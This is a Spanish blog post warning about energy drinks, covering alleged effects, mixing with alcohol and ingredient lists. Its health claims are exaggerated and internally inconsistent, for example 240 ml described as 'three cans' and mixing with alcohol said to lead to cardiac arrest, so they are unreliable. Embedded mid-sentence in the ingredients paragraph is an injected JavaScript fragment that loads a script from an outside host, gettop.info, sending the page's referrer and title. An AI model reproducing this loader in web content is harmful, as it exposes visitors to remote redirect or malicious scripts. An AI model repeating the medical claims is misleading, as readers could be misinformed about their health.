Salud y belleza » Alimentación, Salud

Esos peligrosos “energizantes”

Sin Comentarios

43c6c_EnergyDrinks-1

 

En la actualidad, muchos son los males que pueden ocultarse dentro de una botella.

El alcohol, por supuesto, es el principal enemigo de todo plan dietario. Pero, claro, existen muchos otros nuevos enemigos silenciosos que pueden hacer el mismo daño: los energizantes, por ejemplo.

Considerados como la bebida del “futuro”, los energizantes desde el comienzo han sido eje de varios planes nutricionales: son numerosas las dietas que incluyen en su menú la infusión de alguna de estas bebidas espirituales. Grave error.

Los energizantes, si bien tienen minúsculos aspectos a favor, tienen muchos otros en contra y su ingesta debe ser, como mínimo, moderada.

¿Qué tienen de malo las bebidas energizantes?

Al igual que la cafeína, el gin seng y la taurina, los energizantes -Red Bull, Boost, Speed, Blue Shot y Cult, por citar algunos de los más comunes que se venden hoy en día en España y en el mundo- son estimulantes nerviosos. Tomados en dosis mayores a 240 mililitros (tres latas) pueden ocasionar graves daños como arritmias cardíacas, ansiedad, irritabilidad, dificultades de concentración, diarreas y temblores.
Sus efectos, en cierto modo, son comparables a los de cualquier otra droga pues estimulan al sistema nervioso central, y pueden llegar a dañarlo.
Los energizantes trastornan las funciones cardíacas, provocan hipertensión, hiperactividad, dilatación de las pupilas, vómitos, actitudes agresivas, cambios de humor inesperados como pasar rápidamente de la euforia a la depresión e incluso pueden provocar la depresión crónica. También conllevan un descontrol en la producción de neurotransmisores, lo que causa dependencia y es pivote para una depresión.

¿Y qué pasa cuando se mezclan con alcohol?

Nada bueno. Eso pasa. La combinación provoca un estado de éxtasis sumamente peligroso para el cuerpo humano pues se introduce un depresor del sistema nervioso (alcohol) y un estimulante (bebida energizante). El consumirlas puede provocar, como mínimo, una diarrea que luego conlleva a un desequilibrio electrolítico. Más tarde a un paro cardíaco.

Tampoco se recomienda tomarlos cuando se realiza ejercicio físico porque el doble estímulo causa eventos cardiovasculares o accidentes cerebrovasculares.

¿Qué contienen?

Agua carbonatada, Glucuronolactona, Vitaminas del Grupo B, Taurina, Cafeína, Guaraná o extracto, Azúcar (las versiones no dietéticas), Aspartamo (las versiones dietéticas), L-Carnitina, Vitamina C, Ácido cítrico, Acidulantes, Ginseng o extracto, Betacaroteno, Ácido Pantoténico, fosfato monopotásico, D-Ribosa, Colorante, Caramelo, etc (varía según el fabricante y el modelo que se escoja).
La presencia de Carbohidratos, Cafeína, Vitaminas, Carnitina o D-Ribosa, hacen que supuestamente las bebidas sean regeneradoras y/o energizantes.
Como ya se apuntó, muchos de sus ingredientes tienen un efecto estimulante, haciendo que su mezcla genere una respuesta positiva y esperada, dejando ver efectos de estímulo en nuestro organismo pero también estas bebidas son muy cuestionadas mundialmente por incluir todo esto, a tal nivel que existen organizaciones que descartan uno por uno la utilidad de los ingredientes.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza :

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.